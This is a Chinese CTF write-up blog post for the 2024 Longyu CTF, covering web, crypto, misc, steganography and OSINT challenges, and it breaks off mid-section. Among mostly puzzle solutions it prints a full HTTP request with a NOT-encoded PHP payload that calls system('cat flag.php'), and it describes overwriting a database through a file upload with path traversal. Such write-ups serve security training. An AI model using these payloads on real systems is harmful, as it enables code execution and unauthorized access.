

<!DOCTYPE html>
<html lang="zh-Hans" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Jesen">
  <meta name="keywords" content="Jesen,Jesen&#39;s Blog,ctf,writeups,web,渗透,渗透测试">
  
    <meta name="description" content="前言国庆太闲了，随便打打。  Webweb-签到查看网页源代码 shuangyuCTF-web1$_SERVER[‘REMOTE_ADDR’]是我们的ip地址，那么直接本地跑一些密码生成逻辑获取一下密码即可 1234567891011121314151617181920212223&lt;?phpfunction generate_password($seed) &amp;#123;    &#x2F;&#x2F; 初始化一">
<meta property="og:type" content="article">
<meta property="og:title" content="2024泷羽CTF Writeup">
<meta property="og:url" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp.html">
<meta property="og:site_name" content="Jesen&#39;s Blog">
<meta property="og:description" content="前言国庆太闲了，随便打打。  Webweb-签到查看网页源代码 shuangyuCTF-web1$_SERVER[‘REMOTE_ADDR’]是我们的ip地址，那么直接本地跑一些密码生成逻辑获取一下密码即可 1234567891011121314151617181920212223&lt;?phpfunction generate_password($seed) &amp;#123;    &#x2F;&#x2F; 初始化一">
<meta property="og:locale">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241006201945559.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241001222709774.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241002175650787.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241002151838265.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241004155901423.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241001222027303.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241003162226734.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241005142248664.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241005142422457.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241002123832055.png">
<meta property="og:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/641fc1b2ab28565afd6c42537768514f.png">
<meta property="article:published_time" content="2024-10-06T12:17:36.000Z">
<meta property="article:modified_time" content="2024-10-06T12:32:55.144Z">
<meta property="article:author" content="Jesen">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Writeup">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://jesen.ddwhm.com/2024/10/06/longyuctfwp/image-20241006201945559.png">
  
  
  <title>2024泷羽CTF Writeup - Jesen&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lf3-cdn-tos.bytecdntp.com/cdn/expire-1-M/bootstrap/4.6.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://lf3-cdn-tos.bytecdntp.com/cdn/expire-1-M/hint.css/2.7.0/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://lf6-cdn-tos.bytecdntp.com/cdn/expire-1-M/highlight.js/10.7.3/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://lf26-cdn-tos.bytecdntp.com/cdn/expire-1-M/fancybox/3.5.7/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"jesen.ddwhm.com","root":"/","version":"1.8.14","typing":{"enable":false,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":"#"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.2"><link rel="alternate" href="/atom.xml" title="Jesen's Blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Jesen&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                主页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="2024泷羽CTF Writeup">
              
                2024泷羽CTF Writeup
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2024-10-06 20:17" pubdate>
        October 6, 2024 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      11k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      93 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">2024泷羽CTF Writeup</h1>
            
            <div class="markdown-body">
              <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>国庆太闲了，随便打打。</p>
<p><img src="/2024/10/06/longyuctfwp/image-20241006201945559.png" srcset="/img/loading.gif" lazyload alt="image-20241006201945559"></p>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="web-签到"><a href="#web-签到" class="headerlink" title="web-签到"></a>web-签到</h2><p>查看网页源代码</p>
<h2 id="shuangyuCTF-web1"><a href="#shuangyuCTF-web1" class="headerlink" title="shuangyuCTF-web1"></a>shuangyuCTF-web1</h2><p>$_SERVER[‘REMOTE_ADDR’]是我们的ip地址，那么直接本地跑一些密码生成逻辑获取一下密码即可</p>
<figure class="highlight php"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></div></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">generate_password</span>(<span class="hljs-params"><span class="hljs-variable">$seed</span></span>) </span>&#123;<br>    <span class="hljs-comment">// 初始化一些变量</span><br>    <span class="hljs-variable">$a</span> = <span class="hljs-number">1</span>;<br>    <span class="hljs-variable">$b</span> = <span class="hljs-number">1</span>;<br>    <span class="hljs-variable">$n</span> = <span class="hljs-variable">$seed</span>;<br>    <span class="hljs-comment">// 斐波那契数列生成，但是有点特别</span><br>    <span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> &lt; <span class="hljs-variable">$n</span>; <span class="hljs-variable">$i</span>++) &#123;<br>        <span class="hljs-variable">$temp</span> = <span class="hljs-variable">$a</span> + <span class="hljs-variable">$b</span> + <span class="hljs-variable">$i</span>; <span class="hljs-comment">// 注意这里的变种斐波那契</span><br>        <span class="hljs-variable">$a</span> = <span class="hljs-variable">$b</span>;<br>        <span class="hljs-variable">$b</span> = <span class="hljs-variable">$temp</span>;<br>    &#125;<br>    <span class="hljs-comment">// 将最后的斐波那契数作为密码的一部分</span><br>    <span class="hljs-variable">$password_part1</span> = <span class="hljs-variable">$b</span>;<br>    <span class="hljs-comment">// 还有一些其他的运算</span><br>    <span class="hljs-variable">$password_part2</span> = (<span class="hljs-variable">$seed</span> * <span class="hljs-variable">$seed</span> + <span class="hljs-variable">$seed</span> + <span class="hljs-number">1</span>) % <span class="hljs-number">1000</span>; <span class="hljs-comment">// 这是一个二次函数模运算</span><br>    <span class="hljs-comment">// 密码是这两部分的组合，但是中间有一个固定的分隔符</span><br>    <span class="hljs-variable">$password</span> = <span class="hljs-variable">$password_part1</span> . <span class="hljs-string">&#x27;-&#x27;</span> . <span class="hljs-variable">$password_part2</span>;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$password</span>;<br>&#125;<br><span class="hljs-variable">$seed</span> = <span class="hljs-string">&quot;1.2.3.4&quot;</span> % <span class="hljs-number">100</span>; <span class="hljs-comment">// 使用用户的IP地址作为种子, 改成你的ip</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">generate_password</span>(<span class="hljs-variable">$seed</span>);<br></code></pre></td></tr></table></figure>

<h2 id="Gscsed在线版"><a href="#Gscsed在线版" class="headerlink" title="Gscsed在线版"></a>Gscsed在线版</h2><p>写wp的时候网站挂了</p>
<p>前面的一个判断用的是echo，不影响后面的执行，所以无视第一个判断。</p>
<p>第二个判断过滤了很多，但可以用取反绕过。</p>
<p>大概思路就是直接使用取反绕过进行代码执行，执行cat flag.php即可。</p>
<p>exp：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/123/?GGT=12</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>82.157.178.108<br><span class="hljs-attribute">Pragma</span><span class="hljs-punctuation">: </span>no-cache<br><span class="hljs-attribute">Cache-Control</span><span class="hljs-punctuation">: </span>no-cache<br><span class="hljs-attribute">Upgrade-Insecure-Requests</span><span class="hljs-punctuation">: </span>1<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br><span class="hljs-attribute">Accept-Encoding</span><span class="hljs-punctuation">: </span>gzip, deflate<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: </span>zh-CN,zh;q=0.9,en;q=0.8<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>close<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/x-www-form-urlencoded<br><span class="hljs-attribute">Content-Length</span><span class="hljs-punctuation">: </span>65<br><br><span class="language-llvm">PPT<span class="hljs-operator">=</span>(~<span class="hljs-variable">%8</span>C<span class="hljs-variable">%86</span><span class="hljs-variable">%8</span>C<span class="hljs-variable">%8</span>B<span class="hljs-variable">%9</span>A<span class="hljs-variable">%92</span>)(~<span class="hljs-variable">%9</span>C<span class="hljs-variable">%9</span>E<span class="hljs-variable">%8</span>B<span class="hljs-variable">%DF</span><span class="hljs-variable">%99</span><span class="hljs-variable">%93</span><span class="hljs-variable">%9</span>E<span class="hljs-variable">%98</span><span class="hljs-variable">%D1</span><span class="hljs-variable">%8</span>F<span class="hljs-variable">%97</span><span class="hljs-variable">%8</span>F)<span class="hljs-comment">;</span></span><br></code></pre></td></tr></table></figure>

<h1 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO"></a>CRYPTO</h1><h2 id="shuangyuCTF-AES-amp-Base"><a href="#shuangyuCTF-AES-amp-Base" class="headerlink" title="shuangyuCTF-AES &amp; Base"></a>shuangyuCTF-AES &amp; Base</h2><p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># ----请写出你的解题过程，得到flag---------</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">decrypt</span>(<span class="hljs-params">data, iv, key</span>):<br>    <span class="hljs-comment"># 创建用于解密的AES对象</span><br>    cipher2 = AES.new(key, AES.MODE_CBC, iv)<br>    <span class="hljs-comment"># 解密完成后，需要对数据进行取消填充，获取原来的数据</span><br>    <span class="hljs-comment"># pt = unpad(cipher2.decrypt(data), 16)</span><br>    pt = cipher2.decrypt(data)<br>    <span class="hljs-keyword">return</span> pt<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">h256</span>(<span class="hljs-params">data</span>):<br>    hash_object = hashlib.sha256(data)<br>    <span class="hljs-comment">#print(hash_object.digest()[:8])</span><br>    <span class="hljs-keyword">return</span> hash_object.digest()[:<span class="hljs-number">8</span>]<br><br><span class="hljs-keyword">for</span> sk <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1000</span>):<br>    secret = secret_prefix + <span class="hljs-built_in">repr</span>(sk).rjust(<span class="hljs-number">3</span>,<span class="hljs-string">&#x27;0&#x27;</span>).encode()<br>    secret = h256(secret)<br>    dec_data = decrypt(encoded_item[<span class="hljs-number">16</span>:], encoded_item[:<span class="hljs-number">16</span>], fixed_key_part + secret)<br>    <span class="hljs-keyword">if</span>(<span class="hljs-string">b&quot;flag&quot;</span> <span class="hljs-keyword">in</span> dec_data):<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;解密后的数据：&quot;</span>, dec_data)<br></code></pre></td></tr></table></figure>

<h2 id="At"><a href="#At" class="headerlink" title="At"></a>At</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-comment">#js执行报错</span><br><span class="hljs-comment">#发现是uozt&#123;Mr_s<span class="hljs-doctag">@L</span>_Z!!!&#125;</span><br><br><span class="hljs-comment"># 埃特巴什码解密</span><br><span class="hljs-comment"># http://www.hiencode.com/atbash.html</span><br><br><span class="hljs-comment"># 注意大小写：flag&#123;Ni_h<span class="hljs-doctag">@O</span>_A!!!&#125;</span><br></code></pre></td></tr></table></figure>

<h2 id="Base签到"><a href="#Base签到" class="headerlink" title="Base签到"></a>Base签到</h2><p>base解码</p>
<h2 id="XOR"><a href="#XOR" class="headerlink" title="XOR"></a>XOR</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python">flag = <span class="hljs-string">&quot;zoyistheflag&quot;</span><br><span class="hljs-keyword">for</span> kk <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">26</span>):<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> flag:<br>        asciichar = <span class="hljs-built_in">ord</span>(i)<br>        <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(asciichar^kk),end=<span class="hljs-string">&#x27;&#x27;</span>)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;&quot;</span>)<br><br><span class="hljs-comment"># 输出解密后的结果，请注意格式奥~.~</span><br><span class="hljs-comment"># flag&#123;wbtd~yehkalj&#125;</span><br></code></pre></td></tr></table></figure>



<h2 id="你真的喜欢CTF吗？"><a href="#你真的喜欢CTF吗？" class="headerlink" title="你真的喜欢CTF吗？"></a>你真的喜欢CTF吗？</h2><p>培根密码，注意flag格式 Flag{falgdoyoulikectf}</p>
<h2 id="crypto2"><a href="#crypto2" class="headerlink" title="crypto2"></a>crypto2</h2><p>直接放进浏览器控制台执行即可拿到flag</p>
<h2 id="decode没有key"><a href="#decode没有key" class="headerlink" title="decode没有key"></a>decode没有key</h2><p>根据提示，rot13和base32.</p>
<p>实测，是rot13+字符反转+base32</p>
<p>最后再来个rot13</p>
<p>最终flag：flagishere</p>
<h2 id="一元积分"><a href="#一元积分" class="headerlink" title="一元积分"></a>一元积分</h2><p>百度搜，<a target="_blank" rel="noopener" href="https://easylearn.baidu.com/edu-page/tiangong/questiondetail?id=1811656132685208395&amp;fr=search">https://easylearn.baidu.com/edu-page/tiangong/questiondetail?id=1811656132685208395&amp;fr=search</a></p>
<p>答案a=2</p>
<p>解压得到编码：<code>RMbpoP9B1wmOMH8kLz9P0ml(I3v=</code></p>
<p>然后：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><br>data = <span class="hljs-string">&quot;RMbpoP9B1wmOMH8kLz9P0ml(I3v=&quot;</span>.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>a = base64.b85encode(data)<br><span class="hljs-built_in">print</span>(a)<br></code></pre></td></tr></table></figure>

<p>flag{I_LOVE_susu}</p>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="诗词"><a href="#诗词" class="headerlink" title="诗词"></a>诗词</h2><p>提取图片看到尾部有zip，可以解压出来很多txt。</p>
<p>时间戳不一致，用python写一个时间戳获取脚本</p>
<p>得到flbhxxxxxxxxxx的flag</p>
<p>同时发现bh是ag的ascii+1。</p>
<p>所以再跑一边-1的过程</p>
<p>拿到了两个字符串，分别取其中一部分拿到flag</p>
<p>最后发现是出题人时间戳搞错了，乐。</p>
<h2 id="longpy"><a href="#longpy" class="headerlink" title="longpy"></a>longpy</h2><p>图片里面包含了一个pyc。</p>
<p>用zsteg -E提取出来。</p>
<p>反编译代码然后执行一下，提示了github工具：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/AngelKitty/stegosaurus">AngelKitty/stegosaurus: A steganography tool for embedding payloads within Python bytecode. (github.com)</a></p>
<p>使用工具对pyc进行-x操作拿到flag</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">./stegosaurus 1.pyc -x<br></code></pre></td></tr></table></figure>

<p><img src="/2024/10/06/longyuctfwp/image-20241001222709774.png" srcset="/img/loading.gif" lazyload alt="image-20241001222709774"></p>
<h2 id="看过那年的雪吗？"><a href="#看过那年的雪吗？" class="headerlink" title="看过那年的雪吗？"></a>看过那年的雪吗？</h2><p>原题：<a target="_blank" rel="noopener" href="https://blog.csdn.net/2301_80185313/article/details/140865849#:~:text=%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E6%96%87%E6%9C%AC%E4%BC%BC%E4%B9%8E">https://blog.csdn.net/2301_80185313/article/details/140865849#:~:text=%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E6%96%87%E6%9C%AC%E4%BC%BC%E4%B9%8E</a></p>
<h2 id="1zrecover"><a href="#1zrecover" class="headerlink" title="1zrecover"></a>1zrecover</h2><p>打开压缩包，发现是png，010editorcheck没过，末尾有东西。</p>
<p>利用zsteg -E 提取出来。</p>
<p>发现末尾是KP，那么明显是PK的倒叙，利用脚本提取</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;./data&#x27;</span>,<span class="hljs-string">&#x27;rb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>    data = f.read()<br>    dec = data[::-<span class="hljs-number">1</span>]<br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;./dec_data&#x27;</span>,<span class="hljs-string">&#x27;wb&#x27;</span>) <span class="hljs-keyword">as</span> ww:<br>        ww.write(dec)<br></code></pre></td></tr></table></figure>

<p>提取完是压缩包，密码题目描述里面有，解压里面有flag.zip。</p>
<p>hint.txt提示我们00变成了11，那么一定是异或了</p>
<p>异或0x11即可：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;./flag.zip&#x27;</span>,<span class="hljs-string">&#x27;rb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>    data = f.read()<br>    dec = <span class="hljs-built_in">bytearray</span>()<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> data:<br>        dec.append(i^<span class="hljs-number">0x11</span>)<br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;./flag1.zip&#x27;</span>,<span class="hljs-string">&#x27;wb&#x27;</span>) <span class="hljs-keyword">as</span> ww:<br>        ww.write(dec)<br></code></pre></td></tr></table></figure>

<p>解压发现flag.jpg，末尾有base64，解码是9527</p>
<p>试了一下是outguess隐写</p>
<p>./outguess -k 9527 -r flag.jpg out.txt</p>
<p>打开txt即可拿到flag</p>
<p>flag{C0n9ratu1ati0ns!_you_are_so_cool}</p>
<h2 id="1z-disk-decode"><a href="#1z-disk-decode" class="headerlink" title="1z_disk_decode"></a>1z_disk_decode</h2><p>谜语解不出来，选择密码爆破，爆破出来密码是natasha。</p>
<p><img src="/2024/10/06/longyuctfwp/image-20241002175650787.png" srcset="/img/loading.gif" lazyload alt="image-20241002175650787"></p>
<h2 id="wu-kong"><a href="#wu-kong" class="headerlink" title="wu_kong"></a>wu_kong</h2><p><img src="/2024/10/06/longyuctfwp/image-20241002151838265.png" srcset="/img/loading.gif" lazyload alt="image-20241002151838265"></p>
<h2 id="more-hight"><a href="#more-hight" class="headerlink" title="more_hight"></a>more_hight</h2><p>题目名字很明显，改高度。</p>
<h2 id="FindSeed-MC"><a href="#FindSeed-MC" class="headerlink" title="FindSeed_MC"></a>FindSeed_MC</h2><p>pcl启动器启动游戏，装上搜种子的mod：<a target="_blank" rel="noopener" href="https://github.com/19MisterX98/SeedcrackerX/releases">Releases · 19MisterX98/SeedcrackerX (github.com)</a></p>
<p>然后开挂跑图就行了，跑够了就会帮忙算种子</p>
<p><img src="/2024/10/06/longyuctfwp/image-20241004155901423.png" srcset="/img/loading.gif" lazyload alt="image-20241004155901423"></p>
<p>5880616f80d73e086ec577d7ad21ef99</p>
<h1 id="Forensics"><a href="#Forensics" class="headerlink" title="Forensics"></a>Forensics</h1><h2 id="shuangyuCTF-白小鱼"><a href="#shuangyuCTF-白小鱼" class="headerlink" title="shuangyuCTF-白小鱼"></a>shuangyuCTF-白小鱼</h2><p>流量包里面有一个网站，xiaoyus.top:5000</p>
<p>可以看到一部分代码和upload接口。</p>
<p>有sql，但是无法注入，因为是预编译。</p>
<p>尝试了一下接口可以上传任意文件，同时呢，也可以目录穿越。</p>
<p>那么思路清晰，任意文件上传覆盖database.db</p>
<p>然后登录即可拿到flag。</p>
<p><img src="/2024/10/06/longyuctfwp/image-20241001222027303.png" srcset="/img/loading.gif" lazyload alt="image-20241001222027303"></p>
<p>然后用用户a和对应密码登录即可。</p>
<h2 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h2><p>回复 网盾网络安全培训学校</p>
<h2 id="好吃的可乐"><a href="#好吃的可乐" class="headerlink" title="好吃的可乐"></a>好吃的可乐</h2><p>发现图片里面 心型树，百度一下发现是 福建省福州市的三坊七巷</p>
<p>然后图片里面chag，应该是霸王茶几</p>
<p>搜到了：CHAGEE霸王茶姬(三坊七巷店)</p>
<p>地址在福建省福州市鼓楼区杨桥东路15-1号</p>
<p>base64(福建省福州市鼓楼区杨桥东路15-1号)</p>
<p>加上flag即可。</p>
<h2 id="china"><a href="#china" class="headerlink" title="china"></a>china</h2><p>发现路边指示牌是繁体字，那么就是台湾省</p>
<p>里面有字，松竹xxx路</p>
<p>打开谷歌地图看附近的桥，发现海天桥</p>
<p>尝试：flag{台湾省台中市海天桥}</p>
<p>正确</p>
<h2 id="Canada"><a href="#Canada" class="headerlink" title="Canada"></a>Canada</h2><p>地图上有道路指示，20号公路和138公路附近，且附近是一个机场。</p>
<p>在地图里面挨个看街景，结果在这里：</p>
<p><img src="/2024/10/06/longyuctfwp/image-20241003162226734.png" srcset="/img/loading.gif" lazyload alt="image-20241003162226734"></p>
<p>45.43930779571188, -73.65014878349854</p>
<p>flag{e8e5a0a3a214bc2e393ad9aeb5aaecbb}</p>
<h2 id="image"><a href="#image" class="headerlink" title="image"></a>image</h2><p>google搜图：</p>
<p><img src="/2024/10/06/longyuctfwp/image-20241005142248664.png" srcset="/img/loading.gif" lazyload alt="image-20241005142248664"></p>
<p>点进文章，有提示：</p>
